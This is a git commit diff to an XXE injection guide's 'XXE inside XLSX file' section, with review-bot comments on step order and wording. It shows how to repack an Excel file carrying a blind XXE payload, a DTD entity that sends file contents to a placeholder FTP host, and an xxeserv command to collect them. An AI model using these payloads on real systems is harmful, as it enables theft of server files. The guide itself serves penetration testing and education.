Update XXE Injection

Slight QOL improvements for the recent changes of the chapter `XXE inside XLSX file`
Markus 2021-10-18 10:13:30 +02:00 committed by GitHub
parent 220e0efef6
commit 46aabc8c8c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -506,21 +506,8 @@ GIF (experimental)
Structure of the XLSX: Structure of the XLSX:
``` ```
$ 7z l xxe.xlsx $ 7z l xxe.xlsx
[...]
7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs x64)
Scanning the drive for archives:
1 file, 4758 bytes (5 KiB)
Listing archive: xxe.xlsx
--
Path = xxe.xlsx
Type = zip
Physical Size = 4758
Date Time Attr Size Compressed Name Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------ ------------------- ----- ------------ ------------ ------------------------
2021-10-17 15:19:00 ..... 578 223 _rels/.rels 2021-10-17 15:19:00 ..... 578 223 _rels/.rels
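Review bot: the trimmed `7z l` listing no longer signals that output was cut, since the old `[...]` line went away together with the 7-Zip banner and "Scanning the drive" lines; keeping a single `[...]` placeholder before `Path = xxe.xlsx` would tell readers the listing is abridged rather than a verbatim run. The remaining context (`Path`, `Type`, `Physical Size = 4758`) and the file table are what matter for the chapter, so the cut itself is a good call.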
@ -536,10 +523,13 @@ Physical Size = 4758
2021-10-17 15:19:00 11216 3586 9 files 2021-10-17 15:19:00 11216 3586 9 files
``` ```
Extract the excel file. Extract Excel file: `7z x -oXXE xxe.xlsx`
Rebuild Excel file:
``` ```
$ 7z x -oXXE xxe.xlsx $ cd XXE
$ 7z u ../xxe.xlsx *
``` ```
Add your blind XXE payload inside `xl/workbook.xml`. Add your blind XXE payload inside `xl/workbook.xml`.
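Review bot: the rebuild block (`$ cd XXE` / `$ 7z u ../xxe.xlsx *`) now sits before "Add your blind XXE payload inside `xl/workbook.xml`", which reverses the workflow the chapter describes: extract, edit the XML, then rebuild. A reader following top to bottom would update the archive before changing anything. Either move the rebuild block below the payload steps (it was removed from that position in the next hunk) or change its heading to something like "After editing, rebuild the Excel file:" so the ordering is explicit. Minor style point: "Extract Excel file:" and "Rebuild Excel file:" would read better with the article, "Extract the Excel file:", matching the wording used elsewhere in the chapter.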
@ -559,13 +549,6 @@ Alternativly, add your payload in `xl/sharedStrings.xml`:
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst> <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
``` ```
Rebuild the Excel file.
```
$ cd XXE
$ 7z u ../xxe.xlsx *
```
Using a remote DTD will save us the time to rebuild a document each time we want to retrieve a different file. Using a remote DTD will save us the time to rebuild a document each time we want to retrieve a different file.
Instead we build the document once and then change the DTD. Instead we build the document once and then change the DTD.
And using FTP instead of HTTP allows to retrieve much larger files. And using FTP instead of HTTP allows to retrieve much larger files.
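Review bot: with "Rebuild the Excel file." removed here, the `xl/sharedStrings.xml` alternative loses the only rebuild reminder that followed it, and the rebuild block that replaces it (previous hunk) is placed before the payload instructions, so neither path ends with the repack step; worth keeping one rebuild instruction after both alternatives. Also, the unchanged context line still reads "Alternativly"; the typo ("Alternatively") could be fixed in the same QOL pass.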
@ -577,7 +560,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
``` ```
Start the FTP + HTTP server: Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/xxeserv):
``` ```
$ xxeserv -o files.log -p 2121 -w -wd public -wp 8000 $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000
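Review bot: "receive FTP payload" describes the wrong direction; xxeserv's FTP listener on port 2121 receives the contents of the file referenced by the entity, so "serve the DTD over HTTP and receive the retrieved file over FTP" would be accurate. Since the command uses `-wd public -wp 8000`, the text should also say that the DTD file has to be placed in the `public` directory and that `x.x.x.x` in the entity definition is a placeholder for the host running xxeserv, otherwise the link to the tool alone does not tell the reader how the two pieces fit together.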